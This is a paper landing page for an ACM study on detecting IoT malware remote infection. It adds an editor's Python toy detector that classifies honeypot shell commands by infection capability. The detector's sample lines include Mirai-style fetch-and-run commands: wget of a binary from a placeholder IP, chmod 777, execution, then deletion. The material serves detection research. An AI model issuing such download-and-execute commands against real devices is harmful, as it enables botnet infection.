DOI: 10.1145/3488932.3517423
Research article, Public Access

Understanding and Detecting Remote Infection on Linux-based IoT Devices

Published: 30 May 2022

Abstract

The rapidly growing population, poor security posture, and always-on connectivity of Linux-based Internet of Things (IoT) devices make them ideal targets for attackers. However, because of tight cost constraints and the enormous number of vulnerabilities in such devices, protecting them against attacks is very challenging. Understanding and detecting IoT malware remote infection, the stage before compromised IoT devices are monetized by adversaries, is therefore crucial to mitigating the damage and financial loss caused by IoT malware. In this paper, we conduct an empirical study on a large-scale dataset of 403,464 samples collected from VirusShare and a large group of IoT honeypots to gain deep insight into the characteristics of IoT malware remote infection. We share detailed statistics on the shell commands found in our dataset, highlight the malicious behaviors performed through those commands, investigate the current state of fingerprinting methods for those commands, and offer a taxonomy of shell commands by introducing the notion of infection capability. To demonstrate the usefulness of the knowledge gained from our study, we develop an approach to detect ongoing remote infection activities based on infection capabilities. Our evaluation shows that the approach achieves a 99.22% detection rate for remote infections in the wild while introducing only a small performance overhead.
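
The core idea in the abstract, classifying the shell commands an attacker types during remote infection by the infection capability each one provides and flagging a session once it assembles the capabilities of an infection, can be illustrated with a small detector run over captured command lines. The block below is an added example written for this page; it is not the paper's taxonomy, detector or dataset. The capability classes, the indicator sets, the decision rule and the five sample session lines are all the editor's assumptions, constructed so the example runs offline.

```python
"""
Toy infection-capability detector for shell command lines captured at a
telnet/SSH honeypot.  Added illustration by the editor: the capability
classes, the decision rule and the sample lines are assumptions for this
example, not the taxonomy, detector or data from the paper.
Requires Python 3.8+ (shlex punctuation_chars together with whitespace_split).
"""
import re
import shlex
from pathlib import PurePosixPath

# Tokens that end a simple command (shlex returns runs of punctuation as one token).
SEPARATORS = {";", "&&", "||", "|", "&", "(", ")"}
# Assumed indicator sets (editor's choice, not the paper's).
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "ash", "bash"}
WRITABLE_DIRS = {"/tmp", "/var/tmp", "/var/run", "/dev", "/dev/shm", "/mnt"}
SYSTEM_BIN = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")


def split_commands(line):
    """Split a shell line into simple commands (argv lists), dropping redirections."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current, skip_next = [], [], False
    for tok in lex:
        if skip_next:                          # operand of a redirection, e.g. /dev/null
            skip_next = False
        elif tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        elif tok and set(tok) <= set("<>&"):   # '>', '>>', '>&', '<': redirection operator
            skip_next = True
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def _grants_exec(mode):
    """True if a chmod mode argument sets an execute bit (777, 755, +x, u+rwx ...)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(d) & 1 for d in mode[-3:])
    return re.search(r"[+=][rwst]*x", mode) is not None


def _effective_command(argv):
    """Strip the path and unwrap BusyBox applet invocations ('/bin/busybox wget ...')."""
    name = PurePosixPath(argv[0]).name
    if name == "busybox" and len(argv) > 1:
        return argv[1], argv[2:]
    return name, argv[1:]


def capabilities(argv):
    """Map one simple command to the assumed infection capabilities it exhibits."""
    name, args = _effective_command(argv)
    caps = set()
    if name in DOWNLOADERS:
        caps.add("download")
    if name == "chmod" and any(_grants_exec(a) for a in args):
        caps.add("grant_exec")
    if name == "rm":
        caps.add("cleanup")
    if name == "cd" and any(a in WRITABLE_DIRS for a in args):
        caps.add("stage")
    if name == "uname" or (name == "cat" and any(a.startswith("/proc/") for a in args)):
        caps.add("fingerprint")
    # Running a freshly dropped file (./x, /tmp/x) or feeding a script to a shell.
    if (name in SHELLS and args and not args[0].startswith("-")) or \
            ("/" in argv[0] and not argv[0].startswith(SYSTEM_BIN)):
        caps.add("execute")
    return caps


def analyze(line):
    """Union of capabilities over all simple commands in one session line."""
    caps = set()
    for argv in split_commands(line):
        caps |= capabilities(argv)
    return caps


def is_remote_infection(caps):
    """Assumed decision rule: fetch-and-run, or three distinct capabilities, flags the line."""
    return {"download", "execute"} <= caps or len(caps) >= 3


# Constructed sample session lines (not honeypot data); 198.51.100.0/24 is a documentation range.
SAMPLE_LINES = [
    "cd /tmp || cd /var/run; wget http://198.51.100.7/bins/mips -O .m; chmod 777 .m; ./.m; rm -rf .m",
    "/bin/busybox wget http://198.51.100.7/x -O x; /bin/busybox chmod +x x; ./x",
    "cat /proc/cpuinfo | grep name | head -n 1",
    "uname -a; cat /proc/mounts > /dev/null",
    "cd /var/log; ls -la; tail -n 20 messages",
]


def run_samples():
    """Return (line, sorted capabilities, flagged) for every sample line."""
    return [(line, sorted(caps), is_remote_infection(caps))
            for line in SAMPLE_LINES for caps in [analyze(line)]]


if __name__ == "__main__":
    for line, caps, flagged in run_samples():
        print(f"{'INFECTION' if flagged else 'benign   '} {caps} <- {line}")
```

Two caveats for anyone turning this into a real sensor. The paper's 99.22% figure describes its own detector on in-the-wild traffic and says nothing about this heuristic; a rule like the one above needs an allowlist for legitimate provisioning, which also downloads, chmods and executes files under /tmp. And shlex is only a tokenizer: it does not understand command substitution, here-documents or variable expansion, so a production detector should run a real bash parser before mapping commands to capabilities.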

Supplementary Material

MP4 File (ASIA-CCS22-fp435.mp4): presentation video

Cited By

  • (2024) Swarm Learning and Knowledge Distillation Empowered Self-Driving Detection Against Threat Behavior for Intelligent IoT. IEEE Transactions on Mobile Computing 23(6): 7117-7134, Jun 2024. DOI: 10.1109/TMC.2023.3330514
  • (2024) CMD: Co-Analyzed IoT Malware Detection and Forensics via Network and Hardware Domains. IEEE Transactions on Mobile Computing 23(5): 5589-5603, May 2024. DOI: 10.1109/TMC.2023.3311012
  • (2024) TPE-Det: A Tamper-Proof External Detector via Hardware Traces Analysis Against IoT Malware. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 43(11): 3455-3466, Nov 2024. DOI: 10.1109/TCAD.2024.3444712
  • (2023) C2Store: C2 Server Profiles at Your Fingertips. Proceedings of the ACM on Networking 1(CoNEXT3): 1-21, 28 Nov 2023. DOI: 10.1145/3629132

Published In

ASIA CCS '22: Proceedings of the 2022 ACM on Asia Conference on Computer and Communications Security
May 2022, 1291 pages
ISBN: 9781450391405
DOI: 10.1145/3488932
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected]

Publisher: Association for Computing Machinery, New York, NY, United States

Author Tags

1. linux-based iot
2. malware detection
3. remote infection
4. shell command
Qualifiers

• Research article

Conference

ASIA CCS '22
Overall acceptance rate: 418 of 2,322 submissions, 18%

Article Metrics

• Downloads (last 12 months): 194
• Downloads (last 6 weeks): 24
Reflects downloads up to 25 Dec 2024
